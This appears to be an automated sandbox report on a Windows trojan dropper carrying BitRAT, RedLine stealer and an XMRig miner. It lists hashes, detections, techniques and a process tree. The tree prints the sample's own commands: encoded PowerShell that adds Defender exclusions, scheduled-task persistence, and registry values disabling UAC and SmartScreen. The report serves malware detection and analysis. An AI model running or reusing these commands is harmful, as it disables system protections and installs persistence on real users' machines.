bitrat | f42c028b94d5717a0eda919f4d3264e7b09ea61ad5d7d61d1698515b973d12ea

Analysis

max time kernel
150s
max time network
152s
platform
windows10_x64
resource
win10-en-20211104
submitted
04-12-2021 11:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

adf38593d8b6c9562b56589188733788.exe
Size

8.9MB
MD5

adf38593d8b6c9562b56589188733788
SHA1

dadf3bca69617147c65fe0ac6988091ef99b99b3
SHA256

f42c028b94d5717a0eda919f4d3264e7b09ea61ad5d7d61d1698515b973d12ea
SHA512

a46f4fc8c62be259a70958276f5f31f0d94830cd53acb39907c4ee81204f5203086789b692beb230f9144cc3e24aecd4e3e5f6c693bbd3c9c82b897e0b846dba

Score

10^/10

bitrat redline xenarmor xmrig collection discovery evasion infostealer miner password recovery spyware stealer suricata trojan upx

Malware Config

Signatures

BitRAT
BitRAT is a remote access tool written in C++ and uses leaked source code from other families.
trojan bitrat

BitRAT Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2492-630-0x000000000068A488-mapping.dmp	family_bitrat
behavioral2/memory/2492-632-0x0000000000400000-0x00000000007CE000-memory.dmp	family_bitrat

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 7 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Ujnlfschrqsf.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\Ujnlfschrqsf.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\Installer.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\Installer.exe	family_redline
C:\Users\Admin\Documents\redlineTacNine.exe	family_redline
C:\Users\Admin\Documents\redlineTacNine.exe	family_redline
behavioral2/memory/1096-176-0x0000000005370000-0x000000000586E000-memory.dmp	family_redline

UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112
XenArmor Suite
XenArmor is as suite of password recovery tools for various application.
recovery password xenarmor
suricata: ET MALWARE Observed Malicious SSL Cert (BitRAT CnC)
suricata: ET MALWARE Observed Malicious SSL Cert (BitRAT CnC)
suricata
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

ACProtect 1.3x - 1.4x DLL software 2 IoCs

Detects file using ACProtect software.

Processes:

resource	yara_rule
C:\Users\Admin\Documents\Unknown.dll	acprotect
\Users\Admin\Documents\Unknown.dll	acprotect

XMRig Miner Payload 4 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/3176-816-0x0000000140310068-mapping.dmp	xmrig
behavioral2/memory/1308-817-0x0000000140310068-mapping.dmp	xmrig
behavioral2/memory/3176-821-0x0000000140000000-0x0000000140787000-memory.dmp	xmrig
behavioral2/memory/1308-822-0x0000000140000000-0x0000000140787000-memory.dmp	xmrig

Executes dropped EXE 15 IoCs

Processes:

Ujnlfschrqsf.exeKhgstquy.exeInstaller.exeJavaUpdaters.exeJavaSheduler.exeredlineTacNine.exeSecurityHealthSystray.exesmss.exeSecurityHealthSystray.exeJavaUpdate.exeJavaUpdate.exesihost64.exesmss.exeSecurityHealthSystray.exeSecurityHealthSystray.exe

pid	process
2260	Ujnlfschrqsf.exe
3636	Khgstquy.exe
744	Installer.exe
644	JavaUpdaters.exe
1736	JavaSheduler.exe
1408	redlineTacNine.exe
1096	SecurityHealthSystray.exe
2240	smss.exe
2492	SecurityHealthSystray.exe
3272	JavaUpdate.exe
1992	JavaUpdate.exe
3524	sihost64.exe
1056	smss.exe
2460	SecurityHealthSystray.exe
3744	SecurityHealthSystray.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/2460-843-0x0000000000400000-0x00000000008DC000-memory.dmp	upx

Drops startup file 2 IoCs

Processes:

SecurityHealthSystray.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SecurityHealthSystray.exe	SecurityHealthSystray.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SecurityHealthSystray.exe	SecurityHealthSystray.exe

Loads dropped DLL 1 IoCs

Processes:

SecurityHealthSystray.exe

pid process

3744 SecurityHealthSystray.exe
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
3744	SecurityHealthSystray.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

Processes:

SecurityHealthSystray.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	SecurityHealthSystray.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

JavaSheduler.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	JavaSheduler.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	JavaSheduler.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs

Processes:

SecurityHealthSystray.exe

pid	process
2492	SecurityHealthSystray.exe
2492	SecurityHealthSystray.exe
2492	SecurityHealthSystray.exe
2492	SecurityHealthSystray.exe
2492	SecurityHealthSystray.exe

Suspicious use of SetThreadContext 5 IoCs

Processes:

SecurityHealthSystray.exeJavaUpdate.exeJavaUpdate.exeSecurityHealthSystray.exeSecurityHealthSystray.exe

description	pid	process	target process
PID 1096 set thread context of 2492	1096	SecurityHealthSystray.exe	SecurityHealthSystray.exe
PID 1992 set thread context of 3176	1992	JavaUpdate.exe	explorer.exe
PID 3272 set thread context of 1308	3272	JavaUpdate.exe	explorer.exe
PID 2492 set thread context of 2460	2492	SecurityHealthSystray.exe	SecurityHealthSystray.exe
PID 2460 set thread context of 3744	2460	SecurityHealthSystray.exe	SecurityHealthSystray.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

660 schtasks.exe
676 schtasks.exe
2940 schtasks.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1248 reg.exe

pid	process
660	schtasks.exe
676	schtasks.exe
2940	schtasks.exe

pid	process
1248	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

JavaSheduler.exesmss.exepowershell.exeSecurityHealthSystray.exeredlineTacNine.exepowershell.exepowershell.exepowershell.exepowershell.exeKhgstquy.exeJavaUpdaters.exe

pid	process
1736	JavaSheduler.exe
1736	JavaSheduler.exe
1736	JavaSheduler.exe
1736	JavaSheduler.exe
1736	JavaSheduler.exe
1736	JavaSheduler.exe
1736	JavaSheduler.exe
1736	JavaSheduler.exe
1736	JavaSheduler.exe
1736	JavaSheduler.exe
1736	JavaSheduler.exe
1736	JavaSheduler.exe
1736	JavaSheduler.exe
1736	JavaSheduler.exe
1736	JavaSheduler.exe
1736	JavaSheduler.exe
1736	JavaSheduler.exe
1736	JavaSheduler.exe
2240	smss.exe
2240	smss.exe
2240	smss.exe
2240	smss.exe
2240	smss.exe
2240	smss.exe
2240	smss.exe
2240	smss.exe
2240	smss.exe
2240	smss.exe
2240	smss.exe
2240	smss.exe
2240	smss.exe
2240	smss.exe
2240	smss.exe
2240	smss.exe
2240	smss.exe
2240	smss.exe
2984	powershell.exe
2984	powershell.exe
1096	SecurityHealthSystray.exe
1096	SecurityHealthSystray.exe
1096	SecurityHealthSystray.exe
1096	SecurityHealthSystray.exe
2984	powershell.exe
1408	redlineTacNine.exe
1408	redlineTacNine.exe
3596	powershell.exe
3596	powershell.exe
704	powershell.exe
704	powershell.exe
3596	powershell.exe
704	powershell.exe
760	powershell.exe
760	powershell.exe
2212	powershell.exe
2212	powershell.exe
760	powershell.exe
2212	powershell.exe
3636	Khgstquy.exe
644	JavaUpdaters.exe
1096	SecurityHealthSystray.exe
1096	SecurityHealthSystray.exe
1096	SecurityHealthSystray.exe
1096	SecurityHealthSystray.exe
1096	SecurityHealthSystray.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

Processes:

smss.exe

pid process

1056 smss.exe

pid	process
1056	smss.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

JavaSheduler.exesmss.exeSecurityHealthSystray.exepowershell.exeredlineTacNine.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1736	JavaSheduler.exe
Token: SeDebugPrivilege	2240	smss.exe
Token: SeDebugPrivilege	1096	SecurityHealthSystray.exe
Token: SeDebugPrivilege	2984	powershell.exe
Token: SeDebugPrivilege	1408	redlineTacNine.exe
Token: SeDebugPrivilege	3596	powershell.exe
Token: SeDebugPrivilege	704	powershell.exe
Token: SeIncreaseQuotaPrivilege	3596	powershell.exe
Token: SeSecurityPrivilege	3596	powershell.exe
Token: SeTakeOwnershipPrivilege	3596	powershell.exe
Token: SeLoadDriverPrivilege	3596	powershell.exe
Token: SeSystemProfilePrivilege	3596	powershell.exe
Token: SeSystemtimePrivilege	3596	powershell.exe
Token: SeProfSingleProcessPrivilege	3596	powershell.exe
Token: SeIncBasePriorityPrivilege	3596	powershell.exe
Token: SeCreatePagefilePrivilege	3596	powershell.exe
Token: SeBackupPrivilege	3596	powershell.exe
Token: SeRestorePrivilege	3596	powershell.exe
Token: SeShutdownPrivilege	3596	powershell.exe
Token: SeDebugPrivilege	3596	powershell.exe
Token: SeSystemEnvironmentPrivilege	3596	powershell.exe
Token: SeRemoteShutdownPrivilege	3596	powershell.exe
Token: SeUndockPrivilege	3596	powershell.exe
Token: SeManageVolumePrivilege	3596	powershell.exe
Token: 33	3596	powershell.exe
Token: 34	3596	powershell.exe
Token: 35	3596	powershell.exe
Token: 36	3596	powershell.exe
Token: SeIncreaseQuotaPrivilege	704	powershell.exe
Token: SeSecurityPrivilege	704	powershell.exe
Token: SeTakeOwnershipPrivilege	704	powershell.exe
Token: SeLoadDriverPrivilege	704	powershell.exe
Token: SeSystemProfilePrivilege	704	powershell.exe
Token: SeSystemtimePrivilege	704	powershell.exe
Token: SeProfSingleProcessPrivilege	704	powershell.exe
Token: SeIncBasePriorityPrivilege	704	powershell.exe
Token: SeCreatePagefilePrivilege	704	powershell.exe
Token: SeBackupPrivilege	704	powershell.exe
Token: SeRestorePrivilege	704	powershell.exe
Token: SeShutdownPrivilege	704	powershell.exe
Token: SeDebugPrivilege	704	powershell.exe
Token: SeSystemEnvironmentPrivilege	704	powershell.exe
Token: SeRemoteShutdownPrivilege	704	powershell.exe
Token: SeUndockPrivilege	704	powershell.exe
Token: SeManageVolumePrivilege	704	powershell.exe
Token: 33	704	powershell.exe
Token: 34	704	powershell.exe
Token: 35	704	powershell.exe
Token: 36	704	powershell.exe
Token: SeDebugPrivilege	760	powershell.exe
Token: SeDebugPrivilege	2212	powershell.exe
Token: SeIncreaseQuotaPrivilege	2212	powershell.exe
Token: SeSecurityPrivilege	2212	powershell.exe
Token: SeTakeOwnershipPrivilege	2212	powershell.exe
Token: SeLoadDriverPrivilege	2212	powershell.exe
Token: SeSystemProfilePrivilege	2212	powershell.exe
Token: SeSystemtimePrivilege	2212	powershell.exe
Token: SeProfSingleProcessPrivilege	2212	powershell.exe
Token: SeIncBasePriorityPrivilege	2212	powershell.exe
Token: SeCreatePagefilePrivilege	2212	powershell.exe
Token: SeBackupPrivilege	2212	powershell.exe
Token: SeRestorePrivilege	2212	powershell.exe
Token: SeShutdownPrivilege	2212	powershell.exe
Token: SeDebugPrivilege	2212	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

SecurityHealthSystray.exe

pid process

2492 SecurityHealthSystray.exe
2492 SecurityHealthSystray.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

adf38593d8b6c9562b56589188733788.exeUjnlfschrqsf.exeInstaller.exeJavaSheduler.exeSecurityHealthSystray.execmd.exeKhgstquy.execmd.exeJavaUpdaters.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2388 wrote to memory of 2260	2388	adf38593d8b6c9562b56589188733788.exe	Ujnlfschrqsf.exe
PID 2388 wrote to memory of 2260	2388	adf38593d8b6c9562b56589188733788.exe	Ujnlfschrqsf.exe
PID 2388 wrote to memory of 3636	2388	adf38593d8b6c9562b56589188733788.exe	Khgstquy.exe
PID 2388 wrote to memory of 3636	2388	adf38593d8b6c9562b56589188733788.exe	Khgstquy.exe
PID 2260 wrote to memory of 744	2260	Ujnlfschrqsf.exe	Installer.exe
PID 2260 wrote to memory of 744	2260	Ujnlfschrqsf.exe	Installer.exe
PID 744 wrote to memory of 644	744	Installer.exe	JavaUpdaters.exe
PID 744 wrote to memory of 644	744	Installer.exe	JavaUpdaters.exe
PID 744 wrote to memory of 1736	744	Installer.exe	JavaSheduler.exe
PID 744 wrote to memory of 1736	744	Installer.exe	JavaSheduler.exe
PID 744 wrote to memory of 1408	744	Installer.exe	redlineTacNine.exe
PID 744 wrote to memory of 1408	744	Installer.exe	redlineTacNine.exe
PID 744 wrote to memory of 1408	744	Installer.exe	redlineTacNine.exe
PID 744 wrote to memory of 1096	744	Installer.exe	SecurityHealthSystray.exe
PID 744 wrote to memory of 1096	744	Installer.exe	SecurityHealthSystray.exe
PID 744 wrote to memory of 1096	744	Installer.exe	SecurityHealthSystray.exe
PID 1736 wrote to memory of 660	1736	JavaSheduler.exe	schtasks.exe
PID 1736 wrote to memory of 660	1736	JavaSheduler.exe	schtasks.exe
PID 1096 wrote to memory of 2984	1096	SecurityHealthSystray.exe	powershell.exe
PID 1096 wrote to memory of 2984	1096	SecurityHealthSystray.exe	powershell.exe
PID 1096 wrote to memory of 2984	1096	SecurityHealthSystray.exe	powershell.exe
PID 1096 wrote to memory of 1248	1096	SecurityHealthSystray.exe	reg.exe
PID 1096 wrote to memory of 1248	1096	SecurityHealthSystray.exe	reg.exe
PID 1096 wrote to memory of 1248	1096	SecurityHealthSystray.exe	reg.exe
PID 1736 wrote to memory of 2240	1736	JavaSheduler.exe	smss.exe
PID 1736 wrote to memory of 2240	1736	JavaSheduler.exe	smss.exe
PID 1736 wrote to memory of 2136	1736	JavaSheduler.exe	cmd.exe
PID 1736 wrote to memory of 2136	1736	JavaSheduler.exe	cmd.exe
PID 2136 wrote to memory of 3612	2136	cmd.exe	chcp.com
PID 2136 wrote to memory of 3612	2136	cmd.exe	chcp.com
PID 2136 wrote to memory of 2208	2136	cmd.exe	chcp.com
PID 2136 wrote to memory of 2208	2136	cmd.exe	chcp.com
PID 3636 wrote to memory of 2180	3636	Khgstquy.exe	cmd.exe
PID 3636 wrote to memory of 2180	3636	Khgstquy.exe	cmd.exe
PID 2180 wrote to memory of 3596	2180	cmd.exe	powershell.exe
PID 2180 wrote to memory of 3596	2180	cmd.exe	powershell.exe
PID 644 wrote to memory of 1032	644	JavaUpdaters.exe	cmd.exe
PID 644 wrote to memory of 1032	644	JavaUpdaters.exe	cmd.exe
PID 1032 wrote to memory of 704	1032	cmd.exe	powershell.exe
PID 1032 wrote to memory of 704	1032	cmd.exe	powershell.exe
PID 2180 wrote to memory of 760	2180	cmd.exe	powershell.exe
PID 2180 wrote to memory of 760	2180	cmd.exe	powershell.exe
PID 1032 wrote to memory of 2212	1032	cmd.exe	powershell.exe
PID 1032 wrote to memory of 2212	1032	cmd.exe	powershell.exe
PID 3636 wrote to memory of 400	3636	Khgstquy.exe	cmd.exe
PID 3636 wrote to memory of 400	3636	Khgstquy.exe	cmd.exe
PID 644 wrote to memory of 960	644	JavaUpdaters.exe	cmd.exe
PID 644 wrote to memory of 960	644	JavaUpdaters.exe	cmd.exe
PID 400 wrote to memory of 2940	400	cmd.exe	schtasks.exe
PID 400 wrote to memory of 2940	400	cmd.exe	schtasks.exe
PID 960 wrote to memory of 676	960	cmd.exe	schtasks.exe
PID 960 wrote to memory of 676	960	cmd.exe	schtasks.exe
PID 1096 wrote to memory of 2944	1096	SecurityHealthSystray.exe	cmd.exe
PID 1096 wrote to memory of 2944	1096	SecurityHealthSystray.exe	cmd.exe
PID 1096 wrote to memory of 2944	1096	SecurityHealthSystray.exe	cmd.exe
PID 1096 wrote to memory of 2492	1096	SecurityHealthSystray.exe	SecurityHealthSystray.exe
PID 1096 wrote to memory of 2492	1096	SecurityHealthSystray.exe	SecurityHealthSystray.exe
PID 1096 wrote to memory of 2492	1096	SecurityHealthSystray.exe	SecurityHealthSystray.exe
PID 1096 wrote to memory of 2492	1096	SecurityHealthSystray.exe	SecurityHealthSystray.exe
PID 1096 wrote to memory of 2492	1096	SecurityHealthSystray.exe	SecurityHealthSystray.exe
PID 1096 wrote to memory of 2492	1096	SecurityHealthSystray.exe	SecurityHealthSystray.exe
PID 1096 wrote to memory of 2492	1096	SecurityHealthSystray.exe	SecurityHealthSystray.exe
PID 1096 wrote to memory of 2492	1096	SecurityHealthSystray.exe	SecurityHealthSystray.exe
PID 1096 wrote to memory of 2492	1096	SecurityHealthSystray.exe	SecurityHealthSystray.exe

System policy modification 1 TTPs 11 IoCs

evasion

Modify Registry

T1112

Processes:

JavaSheduler.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableSecureUIAPaths = "0"	JavaSheduler.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ValidateAdminCodeSignatures = "0"	JavaSheduler.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableSmartScreen = "0"	JavaSheduler.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableVirtualization = "0"	JavaSheduler.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken = "0"	JavaSheduler.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	JavaSheduler.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableInstallerDetection = "0"	JavaSheduler.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	JavaSheduler.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	JavaSheduler.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0"	JavaSheduler.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableUIADesktopToggle = "0"	JavaSheduler.exe

C:\Users\Admin\AppData\Local\Temp\adf38593d8b6c9562b56589188733788.exe
"C:\Users\Admin\AppData\Local\Temp\adf38593d8b6c9562b56589188733788.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2388

C:\Users\Admin\AppData\Local\Temp\Ujnlfschrqsf.exe
"C:\Users\Admin\AppData\Local\Temp\Ujnlfschrqsf.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2260

C:\Users\Admin\AppData\Local\Temp\Installer.exe
"C:\Users\Admin\AppData\Local\Temp\Installer.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:744

C:\Users\Admin\Documents\JavaUpdaters.exe
"C:\Users\Admin\Documents\JavaUpdaters.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:644

C:\Windows\SYSTEM32\cmd.exe
"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
5⤵
- Suspicious use of WriteProcessMemory
PID:1032

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:704

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2212

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "JavaUpdate" /tr "C:\Users\Admin\JavaUpdate.exe"
5⤵
- Suspicious use of WriteProcessMemory
PID:960

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "JavaUpdate" /tr "C:\Users\Admin\JavaUpdate.exe"
6⤵
- Creates scheduled task(s)
PID:676

C:\Windows\SYSTEM32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\JavaUpdate.exe"
5⤵
PID:2612

C:\Users\Admin\JavaUpdate.exe
C:\Users\Admin\JavaUpdate.exe
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1992

C:\Windows\system32\cmd.exe
"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
7⤵
PID:396

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
8⤵
PID:868

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
8⤵
PID:3152

C:\Windows\explorer.exe
C:\Windows\explorer.exe bdrrwwdwgydz0 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJS6kTcb2sZJ49Q3iSMDc1H0/qJixxsRFFHuJTRy3GDygkOjVFfVGxiAqnI6VEOc7K3GIpMARLTx8uWvB5r0QCuVxF7mJwq0yZvWtCbqmRbkmZuVZDNS8Z8qSNYFAB9Ezc/UmTMFmIx0AcwGvE4K2P6YLmUzmziU4T47mA6dtccAW3XzwDMQxG3WY1abSgyiNJtkV3dlzQD8J0HdSeITY8LegOxuzUGfCrbTgW9u2VAa7RVnzGoVoJX5bAxBGFalnm/oKnCPIJNkilErgYiQQFePCwbkbNxG9rLOt6BtVbQgZBbjI5+yoXZmTbNVwOoWnVQv9j2OJzMj/D/CCiMS0rucIeLPm5I2quqcTpryb4Vo9+HlPPT2RVsQg2Xx+WtKtCi8H/3R5BYre5iEkJhwqGDEqCiiGtJieTvFYa9LUaN0GOPvVEjCOtoaFltF2Dl/LzjMvLW/HdsZ7p1g5iLOSFzNYYO0TSq337RuFN/21X4vXRdrTXVIZAV2pzmMvGm/mAXuTYURLG4/sTS+HgpY3h1vYVNDWRRucFqvAl0w1LLKcAWDLFSxqixrMrCOUmTYbwmRC8KXPC1aeKdbX+yKxS46zWpYMQphF9mQKcqTsdSuuFy2jl4gEKWMYvC9YHX/UpcJHvIVF1vqi+kmtHvlREfvW6e3OvaXPk1eYm/Cc7rzBH1d/h/DdjyNA9bm+TU3tMjgBJePNGq8iAAVZl1hcEw7o+8XruAZgDJmryPftljgzTigQn4Dwu7XVjedQ9m2d+53BK4EIPVTP/BrxDAeVnlPaFj0vOd4MKQBRCp1vQkS2rxJ2oZ1ReX7opWcR7IW0/881l1T2vhOLfv8cJYpxfZxntVgZ0BVT/Pz884jBLcwpURpAF49IvgqsraaeH6gMOYNMj0Vinsljf7crKght1+dZrNK2+n+PAR2+vYw1Tm3FCM/MgTfuMmVTYkx7NqQjc4JVg1CfCt/cmfGJ71HMoO8Yh3d+uL/0CiDG78z/lQMCEbQ2HJ/U3i3cfcEuPH47qexLrtaDROcVLECp2OLSzXAPjwXFpSD8nMxp72KkGCh3xVV9Q2Lp4AnHE04Vdf+FAko1nf+CD5lD5F9rpUG/xRkY4XNYkOXnBldKVr5ZP+gvfxfgviei2LjaSL0wvgyXGRxQxCFScX+1Y2HUYnN3+hDX9hr02AQWcIZU9XbKNMKlvBvzjyBMIW5Pc23HSIDwphk8oxRYvro45WSrpvb5fA1lbKSXTIiARjSpzkJdFJCkj5w1giikZ4nujLybev0AUFFJs5cWBjNx9qWhN6m05vTZhZJCEwTtMjVRG3zZLIZcuvZiewRKSwMJUMPJsTk2XX7KR7R5pGTxIxsPXQgjnXf1SGF5nHMA5Ay284VN0r5D1jq23i47QIufpQcXxPF9S2WKPsPR0DuSyUHcr8G3Mhq6X79f6wngKrI/3kgXc84uzWstvC6aO4EaZRoKKnPgSuygiJie668FEi5z3RkwiENc2BxP7xqAPAD6AACNpbp6CuVxYeQEy/A/A+Z9XPqfQNdjT42VuX1tsXHy1IeMiZ8VwFn1MryYuuqpy6boHwhOtcfyL5L/ZAlRd3PKBgAJYJiWzUTMU8QWyMU5wGy0kcl0Kn0SHPojjHvh4tJxevM+w==
7⤵
PID:3176

C:\Users\Admin\Documents\JavaSheduler.exe
"C:\Users\Admin\Documents\JavaSheduler.exe"
4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1736

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /rl highest /tn Explorer /tr "C:\Users\Admin\AppData\Roaming\Microsoft\SecureData\smss.exe" /f
5⤵
- Creates scheduled task(s)
PID:660

C:\Users\Admin\AppData\Roaming\Microsoft\SecureData\smss.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\SecureData\smss.exe"
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Remove.bat" "
5⤵
- Suspicious use of WriteProcessMemory
PID:2136

C:\Windows\system32\chcp.com
chcp 1251
6⤵
PID:3612

C:\Windows\system32\chcp.com
chcp 866
6⤵
PID:2208

C:\Users\Admin\Documents\redlineTacNine.exe
"C:\Users\Admin\Documents\redlineTacNine.exe"
4⤵
